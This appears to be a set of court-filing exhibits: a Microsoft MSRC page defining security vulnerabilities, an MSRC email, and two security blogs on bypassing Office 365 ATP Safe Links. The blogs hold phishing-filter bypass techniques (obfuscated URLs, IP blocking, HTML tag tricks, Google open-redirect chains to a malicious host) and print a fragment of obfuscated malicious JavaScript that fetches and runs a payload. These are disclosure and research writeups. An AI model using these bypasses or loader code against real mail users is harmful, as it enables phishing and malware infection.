It may not be obvious at first why it's worth devoting several pages to discussing the meaning of the term. After all, it's possible to look up both "security" and "vulnerability" in a dictionary and come to a reasonable understanding of what it means. By doing this, you might conclude that a security vulnerability is anything that offers a potential avenue of attack against a system, including things like malware, incorrectly configured systems, passwords written on sticky pads, and so on. It's true that issues like these do increase the risk to a system. However, this is a somewhat broader connotation than what's generally used within the security community and as we assess issues within MSRC.

For the context used in the software security industry and in MSRC, a vulnerability is a security exposure that results from a product weakness that the product developer did not intend to introduce and should fix once it is discovered. This gives the term special relevance to the MSRC, whose job it is to find such weaknesses whenever they exist in Microsoft products and correct them. This definition discussed helps identify problems that can and should be fixed. This article will help you understand what types of issues are generally addressed by security bulletins.

## Putting the Definition in Context

It's important to understand that the definition isn't the final word on whether an issue warrants a security bulletin — instead, it's the first word. Whenever MSRC receives a report of a potential security problem, an investigation is begun. If the problem can be reproduced, the following two questions are asked to determine whether a bulletin is needed.

- Does the problem meet the definition of a security vulnerability?
- Does it violate the product's security policy, meaning does it break the "security boundary" of the product?

Think of the security vulnerability definition as an initial filter that's applied to all issues. If a particular security issue doesn't meet the definition of a security vulnerability, it's unlikely that it would warrant a security bulletin. This doesn't mean there won't take any action though. For example, if an investigation shows that there's a bug but not a security vulnerability, MSRC works with the product team to fix it, but the fix would be delivered as part of a service pack or future version of the product rather than through a security update and a bulletin.

If the problem meets the definition of a vulnerability, the next question is whether it violates the product's security boundaries. Every product has a set of assumptions about how it will be used, and a set of promises it makes about the security provided when it's used properly. For instance, User Access Control (UAC) is a technology introduced with Windows Vista that provides a method of separating standard user privileges and tasks from those that require Administrator access. If a Standard User is using the system and attempts to perform an action for which the user has no authorization, a prompt from Windows appears and asks the Administrator account's password. If an Administrator is using the system and attempts to do the same task, there is only a warning prompt. That prompt is known as a "Consent Prompt" because the administrator is only asked to agree to the action before proceeding. A weakness that would allow to bypass the "Consent Prompt" is not considered a security vulnerability, since that is not considered a security boundary.

**A Little Fine Print**

A final point before discussing the definition of *vulnerability*: it isn't intended as a legal document. The main goal in developing it was to make it simple and understandable, even if doing so meant that there are few gray areas. As a result, here are some disclaimers.

- The definition is not a warranty; it's a tool that helps assess whether MSRC should address an issue through a security update. In the end, the decision about which issues warrant bulletins is a judgment call, based on giving our customers the best protection we can. Sometimes bulletins are developed for issues that are, strictly speaking, outside the definition. Likewise, it's conceivable that a particular issue might meet the strict definition but only occur under such rare conditions that customers might be better served if we focused our resources on other, broader, and more impactful problems.

- The definition isn't a Microsoft corporate standard. It's an informal definition that MSRC uses to prioritize work. It isn't a logo requirement or part of any other corporate standard.

**Definition**

Now, here's the definition of a security vulnerability.

***A security vulnerability is a weakness in a product that could allow an attacker to compromise the integrity, availability, or confidentiality of that product.***

Now let's dissect exactly what the definition means. In the discussion that follows, the critical phrases and words are listed from the definition, defined precisely, and explained with examples with how the definition could be applied to real-life cases.

*... a weakness in a product...*

- ***Weakness:*** Security vulnerabilities involve inadvertent weaknesses; by-design weaknesses may sometimes occur in a product, but these aren't security vulnerabilities.

  **Examples:** The choice to implement a 40-bit cipher in a product would not constitute a security vulnerability, even though the protection it provides would be inadequate for some purposes. In contrast, an implementation error that inadvertently caused a 256-bit cipher to discard half the bits in the key would be a security vulnerability.

- ***Product:*** Security vulnerabilities are a result of a problem in a product. Problems that result from adhering to imperfect but widely accepted standards are not security vulnerabilities.

  **Examples:** A browser that, when connecting to an FTP site, conducts the session in plaintext would not be considered to have a security vulnerability, since the FTP specification calls for plaintext sessions. However, if the browser conducted SSL sessions in plaintext, it would constitute a security vulnerability since the SSL specification calls for encrypted sessions.

*... that could allow an attacker to compromise the integrity...*

- ***Integrity:*** Integrity refers to the trustworthiness of a resource. An attacker that exploits a weakness in a product to modify it silently and without authorization is compromising the integrity of that product.

  **Examples:** A weakness that allows an administrator to change the permissions on any file on a system would not be a security vulnerability because an administrator already has this capability. In contrast, if a weakness allowed an unprivileged user to do the same thing, it would constitute a security vulnerability.

*...availability...*

- ***Availability:*** Availability refers to the possibility to access a resource. An attacker that exploits a weakness in a product, denying appropriate user access to it, is compromising the availability of that product.

  **Examples:** A weakness that enables an attacker to cause a server to fail would constitute a security vulnerability, since the attacker would be able to regulate whether the server provided service or not. However, the fact that an attacker could send a huge number of legitimate requests to a server and monopolize its resources would not constitute a security vulnerability, as long as the server operator still could control the computer.

*...confidentiality...*

- ***confidentiality:*** Confidentiality refers to limiting access to information on a resource to authorized people. An attacker that exploits a weakness in a product to access non-public information is compromising the confidentiality of that product.

  **Examples:** A weakness in a web site that enables a visitor to read a file that should not be read would constitute a security vulnerability. However, a weakness that revealed the physical location of a file would not constitute a vulnerability — although such a weakness could be useful for reconnaissance purposes, and could be used in conjunction with a bona fide vulnerability to compromise files, it would not by itself enable an attacker to compromise data, and thus it would not constitute a security vulnerability. (It's worth noting, however, that Microsoft, on occasion, has chosen to develop patches in such cases anyway).

As you can see, integrity, availability, and confidentiality are the three main goals for security. If one or more of these three elements lacks, there is a security vulnerability. A single security vulnerability can compromise one or all these elements at the same time. For instance, an information disclosure vulnerability would compromise the confidentiality of a product, while a remote code execution vulnerability would compromise its integrity, availability, and confidentiality.

### Definition in Practice

As you no doubt noticed, there's quite a bit of room for judgment in the definition. In addition to common sense and a desire to protect our customers, we evaluate potential vulnerabilities by drawing on our years of practical security judgment, and a quick scan of the listing of security bulletins shows that a fairly expansive interpretation of the definition is applied. If you think you may have found a security vulnerability in a Microsoft product, please report it to the Microsoft Security Response Center for immediate investigation. You will receive a response to let you know whether it meets the definition of a security vulnerability.

  Previous Version Docs  •  Blog  •  Contribute  •  Privacy & Cookies  •  Terms of Use  •  Site Feedback  •  Trademarks

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020 Page 309 of

# EXHIBIT 17



**Mikail Tunç <mikail@emtunc.org>**

---

## RE: Re: Re: Re: Re: Exchange Online Advanced Threat Protection TRK:0901003101

**Microsoft Security Response Center** <secure@microsoft.com>              15 March 2017 at 21:10
To: Microsoft Security Response Center <secure@microsoft.com>, "mikail@emtunc.org" <mikail@emtunc.org>

We have completed our investigation and found that this issue doesn't meet security servicing bug bar.

As a result, we have opened a next-version candidate bug for the crash and it will be evaluated for upcoming releases. Thanks, again, for sharing this report with us.
We anticipate no further action on this item from MSRC and will be closing out this case.

Thanks,
Will
MSRC

[Quoted text hidden]

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 311 of

# EXHIBIT 18

Case 0:20-cv-60416-XXXX   Document 3-20   Entered on FLSD Docket 02/26/2020   Page 312 of 726

# Mikail's Blog 

# Bypassing Safe Links in Exchange Online Advanced Threat Protection

In this article I will go through my findings and analysis on the **Safe Links** feature of Microsoft's Office 365 Exchange Online Advanced Threat Protection.

Essentially what Safe Links does is it rewrites all URLs in in-bound e-mails that pass through the Exchange Online Protection platform. So if you send an e-mail to an organization with Safe Links enabled then the e-mail will look like this (original):

```
1  Hello Bob,
2  This is the link I was talking to you about: https://example.com
```

The URL gets rewritten to look like this (passed through Safe Links):

```
1  Hello Bob,
2  This is the link I was talking to you about: https://emea01.safelinks.protection.outlook.com/?url=http%3A%2
```

## Bypass Method 1

It is not uncommon for organizations to add their own domains to the Safe Links whitelist policy. This is done for one of many reasons… either you trust your own domains or you don't want to inconvenience staff when sending documents internally imagine sending a .pdf on your corporate site to 1,000's of staff – a significant portion would click the link and be presented with this page:



This bypass exploits the whitelisted domains in the Safe Links policy by using URL obfuscation techniques.

Imagine you have Example Ltd which owns the domain example.com. The administrators of example.com have added the example.com domain to the whitelist in their Safe Links policy such that e-mails containing the URL example.com don't get re-written by EOP.

Using a URL obfuscation technique like the below can trick EOP into thinking that the domain is whitelisted

when in fact it isn't:

```
1  Hello Bob,
2  This is the link I was talking to you about: https://example.com@emtunc.org/malware.exe
```

As you can see, simply obfuscating the URL by posting bogus credentials tricks Safe Links in to thinking that the domain is example.com instead of emtunc.org/malware.exe.

Another obfuscation technique is:

```
1  Hello Jane in finance,
2  URGENT - please see outstanding invoice due to us: https://example.com.emtunc.org/malware.exe
```

Here the *advanced* threat protection isn't checking the entire domain – instead it is tricked by a basic obfuscation technique of inserting the white-listed domain as a subdomain of the malicious domain.

## Bypass Method 2

With this technique, an attacker could simply block or re-direct requests from the Exchange Online Protection infrastructure – yup, it's as simple as that. It's less of a vulnerability and more of a non-ideal configuration.

Helpfully, Microsoft makes the EOP IP ranges available online so all you need to do is block those ranges on your webserver with some .htaccess rules.

Even if the IP ranges weren't available online, the EOP requests contain absolutely no headers which makes it very easy to distinguish EOP traffic and genuine traffic.

This is what genuine traffic looks like (notice the browser headers are present):

```
1  1.2.3.4 - - [23/Feb/2017:11:58:26 +0000] "GET /blog/02/2017/ninite-appsheet-patching-just-got-easier/ HTTP/
```

This is what EOP requests look like (notice how no headers are sent so easy to distinguish from legitimate traffic):

```
1  40.107.196.15 - - [13/Jan/2017:12:24:03 +0000] "GET /malware.exe HTTP/1.1" 404 406 "-" "-"
```

## Timeline

- **15/01/2017** – First reported
- **20/01/2017** – I requested an update
- **01/02/2017** – I requested an update
- **07/01/2017** – MSRC claimed a 'bug' caused my replies to be missed. MSRC asked for some further clarifications which I addressed
- **15/02/2017** – I requested an update
- **23/02/2017** – I notified MSRC that I will be publishing this article on the 27th
- **24/02/2017** – I was asked to delay the publishing of this post and notified that a new MSRC case was created
- **15/03/2017** – MSRC advised that the issue doesn't *"meet the security servicing bug bar"* and that they are closing the case
- **16/03/2017** – Published

SHARE THIS:



LIKE THIS:

Loading...

Related posts:

1. **Creating Office 365 Mailboxes in a Hybrid Setup**
2. **Using Adsiedit to Increase User Mailbox Size Beyond 2GB on Exchange Server 2003**
3. **Cisco IronPort E-mail Security Appliance Best Practices : Part 3**
4. **Setting up Lync SRV Records with Claranet – Office 365**
5. **Remove Old ActiveSync Devices on Exchange Using PowerShell**

March 16, 2017  Mikail  ATP, exchange online, office 365

## 2 thoughts on "Bypassing Safe Links in Exchange Online Advanced Threat Protection"



**John**

October 20, 2017 at 3:37 PM

How would you rate the feature in it's current state? I did not see a big update on the service as a result of your publication, but I could have overlooked it. Thanks for sharing your experiences and info.

**Mikail**

October 21, 2017 at 8:51 PM

I haven't used Office 365 for a while now so I honestly couldn't tell you, however I did see at least one additional bypass technique published since my blog post.
I certainly wouldn't discourage anyone from using ATP as it's all about defence in depth which I strongly believe in; it's just a shame they couldn't prevent some basic bypasses... or care enough to fix them when they were reported 

Comments are closed.

PREVIOUS
**Ninite Appsheet – Patching Just Got Easier**

NEXT
**JWT Refresh Token Manipulation**

Proudly powered by WordPress

# EXHIBIT 19

This is Google's cache of  https://blog.cryptron.ch/?tag=safe-links.  It is a snapshot of the page as it appeared on Sep 28, 2019 21:31:54 GMT.  The current page could have changed in the meantime. Learn more.

**Full version**      Text-only version      View source

Tip: To quickly find your search term on this page, press **Ctrl+F** or **⌘-F** (Mac) and use the find bar.



# CRYPTRON Security GmbH – Blog

## Schlagwort: Safe Links

# Security analysis of Microsoft Office 365 Advanced Threat Protection (ATP)

**Abstract**

Microsoft Office 365 Advanced Threat Protection (ATP) is a cloud-based email filtering service that helps protect your organization against unknown malware and viruses by providing robust zero-day protection and includes features to safeguard your organization from harmful links in real-time. Microsoft ATP has rich reporting and URL trace capabilities that give administrators insight into the kind of attacks happening in your organization. Unkown or sophisticated attacks could be addressed in different ways. ATP safe links protect an environment when users click malicious links. ATP safe attachments protect against unsafe attachments and this security feature are offered as part of Office 365.

This report gives an introduction of the summary audit results of the content-filter checks and some bypass techniques for Microsoft ATP safe links feature in Office 365.



Architecture of Microsoft Office 365 Advanced Threat Protection ATP safe links

The security experts of CRYPTRON Security has been contracted to conduct a security audit during

the PoC period against Microsoft Advanced Threat Protection (ATP) in Office 365. The security audit with main-focus on ATP safe links research was published in 2018 including an audit summary report. (not public)

The security experts of CRYPTRON Security simulated an external targeted attacker. All security test realized undercontrolled conditions in the CRYPTRON Security Research Labs. The goal of this audit was:

- Testing the ATP safe link & safe attachment service on Windows 10 with Outlook 2016
- Quick ATP content-filter checks with new malware samples (e.g. ThunderShell, PoshC2)
- Identifying if a remote attacker could bypass the safe links & safe attachment feature
- Identifying other vulnerabilities and OWASP Top 10

**During this analysis the security experts of CRYPTRON Security discovered different ways to bypass Advanced Threat Protection (ATP) and Microsoft Safe Links in Office 365.**

Please note that this Blogpost documenting the current situation. The discovery of new vulnerabilities can lead to a different situation in only few weeks. Information about Microsoft Advanced Threat Protection (ATP) and Safe Links are also reported in this post.

## Summary content-filter checks in Microsoft Office 365 with ATP

Microsoft Office 365 Advanced Threat Protection (ATP) is a cloud-based email filtering service that helps protect an organization against unknown malware and viruses by providing robust zero-day protection, and includes features to safeguard your organization from harmful links in real-time. ATP has rich reporting and URL trace capabilities that give administrators insight into the kind ofattacks happening in your organization.

In an Office 365 ATP filtering-only scenario, ATP provides cloud-based email protection for your on-premises Exchange Server 2013 / 2016 environment, legacy Exchange Server versions, or any other on-premises SMTP email solution. In a hybrid deployment, ATP can be configured to protect your messaging environment and control mail routing when you have a mix of on-premises and cloud mailboxes with Exchange Online Protection for inbound email filtering.

Advanced Threat Protection (APT) across Windows 10 and Office on YouTube

*Explore the security across your email and endpoints with the unified ATP (Advanced Threat Protection) experience across Office and Windows. See the spectrum of defense's across known and unknown attacks.*

This content-filter line-up gives a short overview about the security robustness in Office 365 with ATP and sending basically malicious attachments. The content-filter Check was done in 2018 – overall severity of each finding is an evaluation of likelihood and system or business impact.

Majoritarian of malware was blocked by Antivirus or ATP filter mechanisms in Office 365.

| Exploit- & Content Filter Checks | Web | | | | E-Mail | Lokale Speichermedien |
|---|---|---|---|---|---|---|
| Testbeschreibung | http | https | http | https | Office365 | USB-Stick |
| **Aktuelle Exploits** | | | | | | |
| CVE-2017-0199 (MS Word) | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| **Content Filter Checks** | | | | | | |
| Zip mit Exe (messagebox.exe) | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| Zip mit Exe, passwortgeschützt (messagebox.exe) | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| Eicar-Testvirus | geblockt durch Web-Proxy | geblockt durch Web-Proxy | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| EICAR in ZIP mit PWD | geblockt durch Web-Proxy | geblockt durch Web-Proxy | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| EXE (netcat) | geblockt durch Web-Proxy | geblockt durch Web-Proxy | nicht geblockt | nicht geblockt | geblockt durch E-Mail GW | nicht geblockt |
| EXE (FF-Portable) | geblockt durch Web-Proxy | geblockt durch Web-Proxy | nicht geblockt | nicht geblockt | geblockt durch E-Mail GW | nicht geblockt |
| DOC-Datei mit Makro (calc.exe) | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| EXCEL-Datei mit Makro (calc.exe) | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| RAR-Datei | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| JAR-Datei | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | geblockt durch E-Mail GW | nicht geblockt |
| DLL | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| RTF-Datei mit CPL | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | geblockt durch E-Mail GW | nicht geblockt |
| SCR-Datei | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | geblockt durch E-Mail GW | nicht geblockt |
| LNK-Datei (calc.exe) | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | geblockt durch E-Mail GW | nicht geblockt |
| LNK-Datei (Download & EXE) | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | geblockt durch E-Mail GW | nicht geblockt |
| wce in ZIP | geblockt durch Web-Proxy | geblockt durch Web-Proxy | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| Metasploit Bind Shell als DLL | geblockt durch Web-Proxy | geblockt durch Web-Proxy | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| Metasploit Bindshell als EXE in einem ZIP | geblockt durch Web-Proxy | geblockt durch Web-Proxy | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| DOCM-Datei mit Powershell und Mimikatz | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch E-Mail GW | geblockt durch lokale AV |
| ieRAT in doc | geblockt durch lokale AV | geblockt durch lokale AV | nicht geblockt | nicht geblockt | Remote Shell | geblockt durch lokale AV |
| Empire_Stager_Hydra_80.doc | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | Remote Shell | geblockt durch lokale AV |
| Empire_Stager_Hydra_80.docm | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | geblockt durch lokale AV | Remote Shell | geblockt durch lokale AV |
| Empire_Stager_Scrambled_Hydra_80.doc | geblockt durch Web-Proxy | n/a | Remote Shell | n/a | geblockt durch E-Mail GW | Remote Shell bei Guest WLAN |
| Empire_Stager_Scrambled_Hydra_80.docm | geblockt durch Web-Proxy | n/a | Remote Shell | n/a | Remote Shell bei Guest WLAN | Remote Shell bei Guest WLAN |

Microsoft ATP filter check

| New attack vectors with ThunderShell | | | | | | |
|---|---|---|---|---|---|---|
| PS-RemoteShell.ps1 | geblockt durch lokale AV | geblockt durch lokale AV | n/a | n/a | nicht geblockt | Remote Shell bei Guest WLAN |
| **New attack vectors with PoshC2** | | | | | | |
| C2-Installer.ps1 | geblockt durch lokale AV | geblockt durch lokale AV | n/a | n/a | nicht geblockt | Remote Shell bei Guest WLAN |
| **New attack vectors with Steganography** | | | | | | |
| OpenStego 0.7.1 | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt |
| Mr. Crypto 3 | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt |
| DeepSound 2.0 | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt | nicht geblockt |

Microsoft APT filter check with new attack tools

The ThunderShell attack framework was developed for penetration testing reasons and it is basedin

Python. It uses a Redis server for HTTPS communication between the implant and the server and PowerShell for execution of the implant on the target client and any other malicious scripts. The main advantage is that ThunderShell supports certificate pinning for bypassing security products that perform traffic inspection. A similar tool that uses HTTPS as a communication protocol and PowerShell is called PoshC2 – also integral part of this audit. Both tools are using RC4 stream cipher encryption to obfuscate the client and command and control (C&C) server communication.

This screenshot demonstrate a remote shell on the test-client with ThunderShell during the this security research. The ps command is used to provide information about the currently running processes, including their process identification numbers (PIDs).



ThunderShell remote shell ps command

## Security analysis of Microsoft Safe Links in Office 365 with ATP

This section explain security analysis on the Safe Links feature of Microsoft Office 365 Advanced Threat Protection (ATP). Different attack vectors will be illustrated.

| | |
|---|---|
| **ATP Safe Links** | ATP's Safe Links feature proactively protects your users from malicious hyperlinks in a message. The protection remains every time they click the link, as malicious links are dynamically blocked while good links can be accessed. |
| **ATP Safe Attachments** | Safe Attachments protects against unknown malware and viruses, and provides zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special environment where ATP uses a variety of machine learning and analysis techniques to detect malicious intent. If no suspicious activity |

| | is detected, the message is released for delivery to the mailbox. |
|---|---|

The goal of ATP safe links is to rewrite all URL's in email to a Microsoft URL classification service, at the time of user-clicks it's possible to reclassify a URL. This method is preferred as spammers more often replace the phishing URL's site content after a message is being scanned, hence there is a need of reclassification later.

> „For messsage in HTML – ATP Safe links identifies any links that uses the HREF attribute. For messages in plain text – ATP Safe Links uses custom logic to identifiy any text resembling a URL."
>
> — Source: www.microsoft.com

Replacing simple direct links in an email client like Outlook 2016 with links that are almost more than 300 characters long (!), seriously impacts the readability of plain text messages. Most of the emailmailing lists for professional administrators are sending there emails in plaintext format.

For example:



## Microsoft ATP Safe Links – PoC bypass with script tags

Microsoft Safe Links technology was recently launched by Microsoft through Office 365. The goal of this technology is to rewrite all URL's in email to a URL classification service, at the time of user-clicks it's possible to reclassify a URL. This method is preferred as spammers more often replace the phishing URL's site content after a message is being scanned.

This method should work currently in all email clients- from the web mail to mobile app on the smartphone. However, replacing a URL in HTML as text is difficult.

Bypassing Microsoft ATP Safe Links – PoC <a> tag example:

```
<a x=">" href="https://www.cryptron.ch">click me</a>
```

This method to bypass ATP Safe Links should work correctly in all email clients. From the web mail to your iPhone's Mail app. However, replacing a URL in HTML as text is difficult. Another demonstration to bypass ATP Safe Links is to use a <form> tag. Maybe it not work in all email clients.

Bypassing Microsoft ATP Safe Links – PoC<form> tag example:

```
<form action= "https://github.com/mattias-ohlsson/eicar-standard-antivirus-test-files/blob/master/eicar-standard-antivirus-test-file-adobe-acrobat-javascript-alert.pdf">
<input value="Please, click me"></form>
```







Open PDF in Chrome with reflected EICAR STRING

# Microsoft ATP Safe Links − PoC bypass with *.htaccess

The .htaccess (hypertext access) is the default name of Apache's directory level configuration file. It provides the ability to customize configuration directives defined in the main configuration file. With the .htaccess bypass technique, an attacker could simply block or redirect requests from the Microsoft ATP Safe Links service infrastructure.

Microsoft makes the ATP Safe Link IP ranges available online. An attacker needs only to block those IP ranges on the webserver with .htaccess rules. These facilites include basic redirect functionality for instance if a 404 file not found error occurs or for more advanced functions. The following Microsoft data center IP addresses are used by Microsoft Exchange Online Protection (EOP) and Advanced Threat Protection (ATP) services lik Safe Links.

| Microsoft EOP IP ranges by region | | |
|---|---|---|
| **America** | **EMEA** | **APAC** |
| 23.103.132.0/22 | 23.103.132.0/22 | 23.103.136.0/21 |
| 23.103.136.0/21 | 23.103.144.0/22 | 23.103.152.0/22 |
| 23.103.148.0/22 | 40.92.0.0/18 | 40.92.128.0/17 |
| 23.103.152.0/21 | 40.93.0.0/18 | 40.93.128.0/17 |
| 23.103.156.0/22 | 40.94.0.0/18 | 40.94.128.0/17 |
| 23.103.198.0/24 | 40.95.0.0/18 | 40.95.128.0/17 |
| 23.103.200.0/22 | 40.107.0.0/18 | 40.107.128.0/18 |
| 23.103.212.0/22 | 52.100.0.0/18 | 52.100.128.0/17 |
| 40.92.64.0/18 | 52.101.0.0/18 | 52.101.128.0/17 |
| 40.93.64.0/18 | 52.102.0.0/18 | 52.102.128.0/17 |
| 40.94.64.0/18 | 52.103.0.0/18 | 52.103.128.0/17 |
| 40.95.64.0/18 | 94.245.120.64/27 | 65.55.88.0/24 |
| 40.107.64.0/18 | 104.47.0.0/19 | 104.47.64.0/18 |
| 52.100.64.0/18 | 157.55.234.0/24 | 134.170.132.0/24 |
| 52.101.64.0/18 | 157.56.112.0/24 | 134.170.140.0/24 |
| 52.102.64.0/18 | 213.199.154.0/24 | 207.46.51.64/26 |
| 52.103.64.0/18 | 213.199.180.128/26 | |
| 65.55.169.0/24 | | 2a01:111:f400:7c00::/54 |
| 104.47.32.0/19 | 2a01:111:f400:7e00::/56 | |
| 157.56.110.0/23 | 2a01:111:f400:fe00::/56 | |
| 207.46.100.0/24 | | |
| 207.46.163.0/24 | | |
| 216.32.180.0/23 | | |
| 2a01:111:f400:7c00::/54 | | |

Microsoft Exchange Online and Advanced Threat Protection IP range

## Microsoft ATP Safe Links – PoC bypass with Google redirect parameter

A new phishing attack against Microsoft Office 365 customers uses Google's App Engine website to redirect email victims to download malicous files. Interesting for an attacker because this attack vector takes advantage of the trust level in Google's server to bypass ATP Safe Links filters. Security researcher and OWASP named it invalidated open redirect vulnerability.

There are multiple versions of the attack that use the same vulnerability but in this example, the victim received an incident email with a bit.ly (shorted-URL) to download a malforemd document. The URL redirects the victim to one of a few know malware or phishing websites or an information landing page from Google.

We will walk through the bypass techniques and the first level of misdirection is a well-know attack scenario. By replacing the URL with a bit.ly link to keep the victim to click on it. E-Mail filters are not fooled and will resolve basically URL-shortened links to find the target website. This attack method helps to bypass Microsoft ATP Safe Links.



Incoming Phishing email with URL-shortened link from bit.ly

The first part of the URL takes advantage of Google's trust in it's own domain when redirecting URLs from the search engine. For example if an attacker types in the browser the URL:

```
https://www.google.com/url?sa=D&q=https://www.cryptron.ch
```

Google redirects to whatever URL if a user puts in the „q=" parameter because attackers use this method to hide malicious website behind the trusted Google domain. Google responed by stopping the user with this message



Google redirect notice for www.cryptron.ch

However, if a user redirecting to a Google website there is no warning message. Therefore the URL https://www.google.com/url?sa=D&q=https://www.cryptron.ch flashes some seconds in the browser and then continues automatically. The attacker is basically taking advantage of Google's trust level and domain.

This section demonstrates another example but this time with a malicious link to malware. Of course an attacker can rename the malformed file *eicar-standard-antivirus-the-file-adobe-acrobate-javascript-alert.pdf* for hiding filenames on the attacker webserver. This method raises also the possibility to bypass ATP Safe Links and infect coprate users with Spear-Phishing attacks.



## ATP Safe Links – PoC bypass with Google App Engine

Google App Engine often referred to as GAE or simply Google App Engine is a web framework and cloud computing platform for devloping and hosting web applications in Google-managed data centers. Applications are sandboxed and run across multiple servers. Google App Engine offers automatic scaling for web applications – as the number of requets increases for an application Google's App Engine automatically allocates more ressource for the web application to handle the additional demand.

This screenshot demonstrates an ATP Safe Links bypass method with Google App Engine:



Google App Engine URL with Javascript payload

This open redirect vulnerability to bypass ATP Safe Links takes advantage of a website that takes redirect-links as a URL parameter but does not validate it before forwarding to the user. Many websites use redirect-links as a URL parameter and there is nothing inherently wrong with that. For example website gated content and Single Sign On (SSO) use this mechansim often with XML SOAP requets. It becomes a vulnerability once the website does not check the validity of the URL parameter and send the corporate user to a malicious website ormalfrmed file. Also drive by infection vectors are possibe with this method.

Unfortuately, Google's App Engine does not „check" the URL and the re-direct path – an attacker can put any link after „logout?continue=" in the attack URL:

```
https://www.google.com/url?
sa=D&q=https://appengine.google.com/_ah/logout%3Fcontinue%3Dhttp://malicious-
url.com/compliance.php%3Fmn%3D68720339
```

Google App Engine does not verify this link and redirect any user to the malicious website. The

embedded URL with compliance.php downloads an encrypted Javascript file called „compliant_details.js" that by default open the browser and execute the script locally on the system of the victim. To evade predictive and static analysis it builds own functions and variables on the fly – the Javascript script file contact an external webserver farm to download a TXT file containing binary code for executing with Wscript.exe on Microsoft Windows. An attack sample for macOS Mojave (Release 10.14.) are in progress.

```
function eqzQiVm(yfX, xuLS5l){return yfX.charAt(xuLS5l);}var nXsvk = "";
var yj6 = 0;for (yj6 = fET.length – 1; yj6 >= 0; yj6 -= 1){nXsvk += eqzQiVm(fET,
yj6);}return nXsvk;}function wQALF3(kT) {var mELmgzvmfK = "\x72";var bpq ="C"; var oz =
mELmgzvmfK + bpq;oz[3] = hcczz + "\x64\x65";var ij9 = oz[0] + oz[1] + oz[2] + oz[3];var
c24S = String;return c24S[ij9](kT);}function itNrDf1FI(j30i40){var yI = 0;var atlB =
0;while (yI < 99) {yI++;atlB += yI;}return "+"
==j30i40?(-5902+5964):"/"==j30i40?(-2523+2586):eRXgpo0.indexOf(j30i40);}function
sfrK(hUh){var ad87du1;var lN8;var wRyTg6;var rZl9yl;var bB987FsM;var u3qFYIWGlD =
wQALF3(lnpSYiYtV);lnpSYiYtV += 1;}eRXgpo0 += wQALF3(43, 47);var fnp = "=";var bl =
function(xWkLg) {var uYSEsio;try{uYSEsio = (new Function(xWkLg))(uYSEsio);return uYSEsio;}
catch(dEr) {return false;}};function yRk(d5AX) { return new ActiveXObject(d5AX);}try {
yRk("g8AeMp45n");}catch(vDQQxQ){var
nsWfGl="
ZoAUJYXIFExGl9CEDBBLEBRR lNUCksWBmYDPDcBScZWOOEWBkcmK9ADcglCKMUkCSAUbEdhCAgABhkSJBxyBxIQLD9
AOpAjD7VoHWRDG4cFeT8TMroBKORRW/TXfdpxT7T0hssATmyBQRToTm4z0+
```
Malicious file from compliance.php script with encrypted Javascript (attack) payload

## Conclusion

An organization keeps an archive of business emails going back over a decade. Emails are important for record keeping especially true for public institutions.

Microsoft ATP Safe Links service relies on Microsoft servers continuousely running to scan and translate clicked URLs from millions of users.  If Microsoft ever discontinues this service all of this Links in the email archives will become completely unusable. Links in emails themselves may not even contain all the information in the original URL – the original destination may not even be able to be deciphreable in the future. That does not make sense for record-keeping approach.

The European Union will start to enforce the General Data Protection Regulation (GDPR) since May 2018. In term of content, the EU GDPR leads to various key innovations such as the „right to forget", whereby data subjects can have their data breaches. New are that companies that violate the GDPR rules can be sanctioned with a maxium fine of 20 million euros or 4 percent of the annual turnover.

This secnario in Microsoft ATP Safe Links for Office 365 appears to suggest that the organization will receive reports with individually identifying information about every link clicked by every email user in the Cloud. Surely, there are some tradeoff's between privacy and security but this seems at least, like a significant movment away from the norms of privacy that employees currently expect – in addition, Microsoft ATP Safe Links can be bypassed with technical methods as described in this blog.

References:

https://docs.microsoft.com/en-us/office365/securitycompliance/atp-safe-links
https://docs.microsoft.com/en-us/office365/securitycompliance/office-365-atp
https://technet.microsoft.com/de-de/library/jj723119(v=exchg.150).aspx
https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX%3A32016R0679

